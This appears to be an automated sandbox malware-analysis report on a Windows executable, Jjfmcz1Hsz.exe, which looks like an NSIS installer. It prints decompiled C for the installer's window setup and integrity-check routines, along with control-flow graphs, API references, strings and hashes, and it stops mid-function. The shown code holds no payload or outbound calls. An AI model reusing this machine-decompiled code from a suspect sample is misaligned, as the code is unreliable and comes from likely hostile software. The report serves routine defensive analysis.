                                                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3282139019-0
                                                                                                                                                                            • Opcode ID: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                                                                                                                                                            • Instruction ID: e8e4c14712e0ebd1bd3c96694815290efe84e81baa174b168cbdfcdac135d6c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                                                                                                                                                            • Instruction Fuzzy Hash: 29C1DF71A04205BBDB20AF61EE45E2B3E7CFB45706B40453EF601B11E1C779A942AB6E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 353 403679-403691 call 406092 356 403693-40369e GetUserDefaultUILanguage call 405c57 353->356 357 4036a5-4036d6 call 405be0 353->357 361 4036a3 356->361 362 4036d8-4036e9 call 405be0 357->362 363 4036ee-4036f4 lstrcatA 357->363 364 4036f9-403722 call 40393e call 405859 361->364 362->363 363->364 370 403728-40372d 364->370 371 4037a9-4037b1 call 405859 364->371 370->371 372 40372f-403753 call 405be0 370->372 377 4037b3-4037ba call 405d1b 371->377 378 4037bf-4037e4 LoadImageA 371->378 372->371 382 403755-403757 372->382 377->378 380 403865-40386d call 40140b 378->380 381 4037e6-403816 RegisterClassA 378->381 395 403877-403882 call 40393e 380->395 396 40386f-403872 380->396 383 403934 381->383 384 40381c-403860 SystemParametersInfoA CreateWindowExA 381->384 386 403768-403774 lstrlenA 382->386 387 403759-403766 call 405796 382->387 389 403936-40393d 383->389 384->380 390 403776-403784 lstrcmpiA 386->390 391 40379c-4037a4 call 40576b call 405cf9 386->391 387->386 390->391 394 403786-403790 GetFileAttributesA 390->394 391->371 398 403792-403794 394->398 399 403796-403797 call 4057b2 394->399 405 403888-4038a2 ShowWindow call 406024 395->405 406 40390b-403913 call 404fe4 395->406 396->389 398->391 398->399 399->391 413 4038a4-4038a9 call 406024 405->413 414 4038ae-4038c0 GetClassInfoA 405->414 411 403915-40391b 406->411 412 40392d-40392f call 40140b 406->412 411->396 417 403921-403928 call 40140b 411->417 412->383 413->414 415 4038c2-4038d2 GetClassInfoA RegisterClassA 414->415 416 4038d8-4038fb DialogBoxParamA call 40140b 414->416 415->416 422 403900-403909 call 4035c9 416->422 417->396 422->389
                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E00403679(void* __eflags) {
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				int _v12;
                                                                                                                                                                            				void _v16;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            				int _t28;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				int _t34;
                                                                                                                                                                            				int _t35;
                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                            				int _t39;
                                                                                                                                                                            				char _t57;
                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                            				signed char _t63;
                                                                                                                                                                            				signed short _t67;
                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                            				CHAR* _t81;
                                                                                                                                                                            
                                                                                                                                                                            				_t76 =  *0x423710;
                                                                                                                                                                            				_t17 = E00406092(2);
                                                                                                                                                                            				_t84 = _t17;
                                                                                                                                                                            				if(_t17 == 0) {
                                                                                                                                                                            					_t74 = 0x41fd08;
                                                                                                                                                                            					"1033" = 0x30;
                                                                                                                                                                            					 *0x42a001 = 0x78;
                                                                                                                                                                            					 *0x42a002 = 0;
                                                                                                                                                                            					E00405BE0(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fd08, 0);
                                                                                                                                                                            					__eflags =  *0x41fd08;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						E00405BE0(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x41fd08, 0);
                                                                                                                                                                            					}
                                                                                                                                                                            					lstrcatA("1033", _t74);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t67 =  *_t17(); // executed
                                                                                                                                                                            					E00405C57("1033", _t67 & 0x0000ffff);
                                                                                                                                                                            				}
                                                                                                                                                                            				E0040393E(_t71, _t84);
                                                                                                                                                                            				_t80 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical";
                                                                                                                                                                            				 *0x423780 =  *0x423718 & 0x00000020;
                                                                                                                                                                            				 *0x42379c = 0x10000;
                                                                                                                                                                            				if(E00405859(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical") != 0) {
                                                                                                                                                                            					L16:
                                                                                                                                                                            					if(E00405859(_t92, _t80) == 0) {
                                                                                                                                                                            						E00405D1B(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t25 = LoadImageA( *0x423700, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                                                            					 *0x422ee8 = _t25;
                                                                                                                                                                            					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                                                                                                                            						L21:
                                                                                                                                                                            						if(E0040140B(0) == 0) {
                                                                                                                                                                            							_t27 = E0040393E(_t71, __eflags);
                                                                                                                                                                            							__eflags =  *0x4237a0;
                                                                                                                                                                            							if( *0x4237a0 != 0) {
                                                                                                                                                                            								_t28 = E00404FE4(_t27, 0);
                                                                                                                                                                            								__eflags = _t28;
                                                                                                                                                                            								if(_t28 == 0) {
                                                                                                                                                                            									E0040140B(1);
                                                                                                                                                                            									goto L33;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags =  *0x422ecc; // 0x0
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									E0040140B(2);
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L22;
                                                                                                                                                                            							}
                                                                                                                                                                            							ShowWindow( *0x41fce8, 5); // executed
                                                                                                                                                                            							_t34 = E00406024("RichEd20"); // executed
                                                                                                                                                                            							__eflags = _t34;
                                                                                                                                                                            							if(_t34 == 0) {
                                                                                                                                                                            								E00406024("RichEd32");
                                                                                                                                                                            							}
                                                                                                                                                                            							_t81 = "RichEdit20A";
                                                                                                                                                                            							_t35 = GetClassInfoA(0, _t81, 0x422ea0);
                                                                                                                                                                            							__eflags = _t35;
                                                                                                                                                                            							if(_t35 == 0) {
                                                                                                                                                                            								GetClassInfoA(0, "RichEdit", 0x422ea0);
                                                                                                                                                                            								 *0x422ec4 = _t81;
                                                                                                                                                                            								RegisterClassA(0x422ea0);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t36 =  *0x422ee0; // 0x0
                                                                                                                                                                            							_t39 = DialogBoxParamA( *0x423700, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A0B, 0); // executed
                                                                                                                                                                            							E004035C9(E0040140B(5), 1);
                                                                                                                                                                            							return _t39;
                                                                                                                                                                            						}
                                                                                                                                                                            						L22:
                                                                                                                                                                            						_t31 = 2;
                                                                                                                                                                            						return _t31;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t71 =  *0x423700;
                                                                                                                                                                            						 *0x422ea4 = E00401000;
                                                                                                                                                                            						 *0x422eb0 =  *0x423700;
                                                                                                                                                                            						 *0x422eb4 = _t25;
                                                                                                                                                                            						 *0x422ec4 = 0x4091f4;
                                                                                                                                                                            						if(RegisterClassA(0x422ea0) == 0) {
                                                                                                                                                                            							L33:
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                                                                                                                            						 *0x41fce8 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423700, 0);
                                                                                                                                                                            						goto L21;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t71 =  *(_t76 + 0x48);
                                                                                                                                                                            					if(_t71 == 0) {
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t74 = 0x4226a0;
                                                                                                                                                                            					E00405BE0( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423738, 0x4226a0, 0);
                                                                                                                                                                            					_t57 =  *0x4226a0; // 0x43
                                                                                                                                                                            					if(_t57 == 0) {
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t57 == 0x22) {
                                                                                                                                                                            						_t74 = 0x4226a1;
                                                                                                                                                                            						 *((char*)(E00405796(0x4226a1, 0x22))) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                                                                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						E00405CF9(_t80, E0040576B(_t74));
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t63 = GetFileAttributesA(_t74);
                                                                                                                                                                            						if(_t63 == 0xffffffff) {
                                                                                                                                                                            							L14:
                                                                                                                                                                            							E004057B2(_t74);
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t92 = _t63 & 0x00000010;
                                                                                                                                                                            						if((_t63 & 0x00000010) != 0) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}


























                                                                                                                                                                            0x0040367f
                                                                                                                                                                            0x00403688
                                                                                                                                                                            0x0040368f
                                                                                                                                                                            0x00403691
                                                                                                                                                                            0x004036a5
                                                                                                                                                                            0x004036b7
                                                                                                                                                                            0x004036be
                                                                                                                                                                            0x004036c5
                                                                                                                                                                            0x004036cb
                                                                                                                                                                            0x004036d0
                                                                                                                                                                            0x004036d6
                                                                                                                                                                            0x004036e9
                                                                                                                                                                            0x004036e9
                                                                                                                                                                            0x004036f4
                                                                                                                                                                            0x00403693
                                                                                                                                                                            0x00403693
                                                                                                                                                                            0x0040369e
                                                                                                                                                                            0x0040369e
                                                                                                                                                                            0x004036f9
                                                                                                                                                                            0x00403703
                                                                                                                                                                            0x0040370c
                                                                                                                                                                            0x00403711
                                                                                                                                                                            0x00403722
                                                                                                                                                                            0x004037a9
                                                                                                                                                                            0x004037b1
                                                                                                                                                                            0x004037ba
                                                                                                                                                                            0x004037ba
                                                                                                                                                                            0x004037d0
                                                                                                                                                                            0x004037d6
                                                                                                                                                                            0x004037e4
                                                                                                                                                                            0x00403865
                                                                                                                                                                            0x0040386d
                                                                                                                                                                            0x00403877
                                                                                                                                                                            0x0040387c
                                                                                                                                                                            0x00403882
                                                                                                                                                                            0x0040390c
                                                                                                                                                                            0x00403911
                                                                                                                                                                            0x00403913
                                                                                                                                                                            0x0040392f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040392f
                                                                                                                                                                            0x00403915
                                                                                                                                                                            0x0040391b
                                                                                                                                                                            0x00403923
                                                                                                                                                                            0x00403923
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040391b
                                                                                                                                                                            0x00403890
                                                                                                                                                                            0x0040389b
                                                                                                                                                                            0x004038a0
                                                                                                                                                                            0x004038a2
                                                                                                                                                                            0x004038a9
                                                                                                                                                                            0x004038a9
                                                                                                                                                                            0x004038b4
                                                                                                                                                                            0x004038bc
                                                                                                                                                                            0x004038be
                                                                                                                                                                            0x004038c0
                                                                                                                                                                            0x004038c9
                                                                                                                                                                            0x004038cc
                                                                                                                                                                            0x004038d2
                                                                                                                                                                            0x004038d2
                                                                                                                                                                            0x004038d8
                                                                                                                                                                            0x004038f1
                                                                                                                                                                            0x00403902
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403907
                                                                                                                                                                            0x0040386f
                                                                                                                                                                            0x00403871
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004037e6
                                                                                                                                                                            0x004037e6
                                                                                                                                                                            0x004037f2
                                                                                                                                                                            0x004037fc
                                                                                                                                                                            0x00403802
                                                                                                                                                                            0x00403807
                                                                                                                                                                            0x00403816
                                                                                                                                                                            0x00403934
                                                                                                                                                                            0x00403934
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403934
                                                                                                                                                                            0x00403825
                                                                                                                                                                            0x00403860
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403860
                                                                                                                                                                            0x00403728
                                                                                                                                                                            0x00403728
                                                                                                                                                                            0x0040372d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403737
                                                                                                                                                                            0x00403747
                                                                                                                                                                            0x0040374c
                                                                                                                                                                            0x00403753
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403757
                                                                                                                                                                            0x00403759
                                                                                                                                                                            0x00403766
                                                                                                                                                                            0x00403766
                                                                                                                                                                            0x0040376e
                                                                                                                                                                            0x00403774
                                                                                                                                                                            0x0040379c
                                                                                                                                                                            0x004037a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403786
                                                                                                                                                                            0x00403787
                                                                                                                                                                            0x00403790
                                                                                                                                                                            0x00403796
                                                                                                                                                                            0x00403797
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403797
                                                                                                                                                                            0x00403792
                                                                                                                                                                            0x00403794
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403794
                                                                                                                                                                            0x00403774

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                                                                                                                                                              • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,76803410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",00000000), ref: 00403693
                                                                                                                                                                              • Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64
                                                                                                                                                                            • lstrcatA.KERNEL32(1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,76803410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",00000000), ref: 004036F4
                                                                                                                                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,76803410), ref: 00403769
                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 0040377C
                                                                                                                                                                            • GetFileAttributesA.KERNEL32(Call), ref: 00403787
                                                                                                                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical), ref: 004037D0
                                                                                                                                                                            • RegisterClassA.USER32(00422EA0), ref: 0040380D
                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403825
                                                                                                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385A
                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403890
                                                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004038BC
                                                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004038C9
                                                                                                                                                                            • RegisterClassA.USER32(00422EA0), ref: 004038D2
                                                                                                                                                                            • DialogBoxParamA.USER32(?,00000000,00403A0B,00000000), ref: 004038F1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                            • API String ID: 606308-3889562710
                                                                                                                                                                            • Opcode ID: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                                                                                                                                                            • Instruction ID: cdcda0c5d6d895e27caec97b3fe99e3f57ebd92391a3aca4eab7d54baf018be6
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                                                                                                                                                            • Instruction Fuzzy Hash: FA61C8B16442007ED620BF669D45F373AACEB44759F40447FF941B22E2C77CAD029A2D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 426 402c66-402cb4 GetTickCount GetModuleFileNameA call 40596c 429 402cc0-402cee call 405cf9 call 4057b2 call 405cf9 GetFileSize 426->429 430 402cb6-402cbb 426->430 438 402cf4 429->438 439 402ddb-402de9 call 402c02 429->439 431 402e98-402e9c 430->431 441 402cf9-402d10 438->441 445 402deb-402dee 439->445 446 402e3e-402e43 439->446 443 402d12 441->443 444 402d14-402d1d call 40307b 441->444 443->444 452 402d23-402d2a 444->452 453 402e45-402e4d call 402c02 444->453 448 402df0-402e08 call 403091 call 40307b 445->448 449 402e12-402e3c GlobalAlloc call 403091 call 402e9f 445->449 446->431 448->446 474 402e0a-402e10 448->474 449->446 472 402e4f-402e60 449->472 457 402da6-402daa 452->457 458 402d2c-402d40 call 405927 452->458 453->446 462 402db4-402dba 457->462 463 402dac-402db3 call 402c02 457->463 458->462 477 402d42-402d49 458->477 469 402dc9-402dd3 462->469 470 402dbc-402dc6 call 406107 462->470 463->462 469->441 473 402dd9 469->473 470->469 479 402e62 472->479 480 402e68-402e6d 472->480 473->439 474->446 474->449 477->462 478 402d4b-402d52 477->478 478->462 482 402d54-402d5b 478->482 479->480 483 402e6e-402e74 480->483 482->462 484 402d5d-402d64 482->484 483->483 485 402e76-402e91 SetFilePointer call 405927 483->485 484->462 486 402d66-402d86 484->486 489 402e96 485->489 486->446 488 402d8c-402d90 486->488 490 402d92-402d96 488->490 491 402d98-402da0 488->491 489->431 490->473 490->491 491->462 492 402da2-402da4 491->492 492->462
                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                            			E00402C66(void* __eflags, signed int _a4) {
                                                                                                                                                                            				DWORD* _v8;
                                                                                                                                                                            				DWORD* _v12;
                                                                                                                                                                            				void* _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				long _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				long _t43;
                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            				void* _t57;
                                                                                                                                                                            				intOrPtr* _t59;
                                                                                                                                                                            				long _t60;
                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                            				long _t82;
                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				void* _t89;
                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                            				void* _t94;
                                                                                                                                                                            
                                                                                                                                                                            				_t82 = 0;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_t43 = GetTickCount();
                                                                                                                                                                            				_t91 = "C:\\Users\\Arthur\\Desktop\\Jjfmcz1Hsz.exe";
                                                                                                                                                                            				 *0x42370c = _t43 + 0x3e8;
                                                                                                                                                                            				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\Jjfmcz1Hsz.exe", 0x400);
                                                                                                                                                                            				_t89 = E0040596C(_t91, 0x80000000, 3);
                                                                                                                                                                            				_v16 = _t89;
                                                                                                                                                                            				 *0x409018 = _t89;
                                                                                                                                                                            				if(_t89 == 0xffffffff) {
                                                                                                                                                                            					return "Error launching installer";
                                                                                                                                                                            				}
                                                                                                                                                                            				_t92 = "C:\\Users\\Arthur\\Desktop";
                                                                                                                                                                            				E00405CF9("C:\\Users\\Arthur\\Desktop", _t91);
                                                                                                                                                                            				E00405CF9(0x42b000, E004057B2(_t92));
                                                                                                                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                                                                                                                            				__eflags = _t50;
                                                                                                                                                                            				 *0x4168c4 = _t50;
                                                                                                                                                                            				_t93 = _t50;
                                                                                                                                                                            				if(_t50 <= 0) {
                                                                                                                                                                            					L24:
                                                                                                                                                                            					E00402C02(1);
                                                                                                                                                                            					__eflags =  *0x423714 - _t82;
                                                                                                                                                                            					if( *0x423714 == _t82) {
                                                                                                                                                                            						goto L29;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _v8 - _t82;
                                                                                                                                                                            					if(_v8 == _t82) {
                                                                                                                                                                            						L28:
                                                                                                                                                                            						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                                                                                            						_t94 = _t53;
                                                                                                                                                                            						E00403091( *0x423714 + 0x1c);
                                                                                                                                                                            						_push(_v24);
                                                                                                                                                                            						_push(_t94);
                                                                                                                                                                            						_push(_t82);
                                                                                                                                                                            						_push(0xffffffff); // executed
                                                                                                                                                                            						_t57 = E00402E9F(); // executed
                                                                                                                                                                            						__eflags = _t57 - _v24;
                                                                                                                                                                            						if(_t57 == _v24) {
                                                                                                                                                                            							__eflags = _v44 & 0x00000001;
                                                                                                                                                                            							 *0x423710 = _t94;
                                                                                                                                                                            							 *0x423718 =  *_t94;
                                                                                                                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                                                                                                                            								 *0x42371c =  *0x42371c + 1;
                                                                                                                                                                            								__eflags =  *0x42371c;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                                                                                                                            							_t59 = _t40;
                                                                                                                                                                            							_t85 = 8;
                                                                                                                                                                            							do {
                                                                                                                                                                            								_t59 = _t59 - 8;
                                                                                                                                                                            								 *_t59 =  *_t59 + _t94;
                                                                                                                                                                            								_t85 = _t85 - 1;
                                                                                                                                                                            								__eflags = _t85;
                                                                                                                                                                            							} while (_t85 != 0);
                                                                                                                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                                                                                                                            							E00405927(0x423720, _t94 + 4, 0x40);
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L29;
                                                                                                                                                                            					}
                                                                                                                                                                            					E00403091( *0x40a8b8);
                                                                                                                                                                            					_t65 = E0040307B( &_a4, 4);
                                                                                                                                                                            					__eflags = _t65;
                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                            						goto L29;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _v12 - _a4;
                                                                                                                                                                            					if(_v12 != _a4) {
                                                                                                                                                                            						goto L29;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L28;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t90 = _t93;
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						_t70 = ( ~( *0x423714) & 0x00007e00) + 0x200;
                                                                                                                                                                            						__eflags = _t93 - _t70;
                                                                                                                                                                            						if(_t93 >= _t70) {
                                                                                                                                                                            							_t90 = _t70;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t71 = E0040307B(0x4168c8, _t90);
                                                                                                                                                                            						__eflags = _t71;
                                                                                                                                                                            						if(_t71 == 0) {
                                                                                                                                                                            							E00402C02(1);
                                                                                                                                                                            							L29:
                                                                                                                                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *0x423714;
                                                                                                                                                                            						if( *0x423714 != 0) {
                                                                                                                                                                            							__eflags = _a4 & 0x00000002;
                                                                                                                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                                                                                                                            								E00402C02(0);
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						E00405927( &_v44, 0x4168c8, 0x1c);
                                                                                                                                                                            						_t77 = _v44;
                                                                                                                                                                            						__eflags = _t77 & 0xfffffff0;
                                                                                                                                                                            						if((_t77 & 0xfffffff0) != 0) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v40 - 0xdeadbeef;
                                                                                                                                                                            						if(_v40 != 0xdeadbeef) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v28 - 0x74736e49;
                                                                                                                                                                            						if(_v28 != 0x74736e49) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v32 - 0x74666f73;
                                                                                                                                                                            						if(_v32 != 0x74666f73) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v36 - 0x6c6c754e;
                                                                                                                                                                            						if(_v36 != 0x6c6c754e) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						_a4 = _a4 | _t77;
                                                                                                                                                                            						_t87 =  *0x40a8b8; // 0x46d8a
                                                                                                                                                                            						 *0x4237a0 =  *0x4237a0 | _a4 & 0x00000002;
                                                                                                                                                                            						_t80 = _v20;
                                                                                                                                                                            						__eflags = _t80 - _t93;
                                                                                                                                                                            						 *0x423714 = _t87;
                                                                                                                                                                            						if(_t80 > _t93) {
                                                                                                                                                                            							goto L29;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _a4 & 0x00000008;
                                                                                                                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                                                                                                                            							L16:
                                                                                                                                                                            							_v8 = _v8 + 1;
                                                                                                                                                                            							_t24 = _t80 - 4; // 0x409194
                                                                                                                                                                            							_t93 = _t24;
                                                                                                                                                                            							__eflags = _t90 - _t93;
                                                                                                                                                                            							if(_t90 > _t93) {
                                                                                                                                                                            								_t90 = _t93;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _a4 & 0x00000004;
                                                                                                                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            						L20:
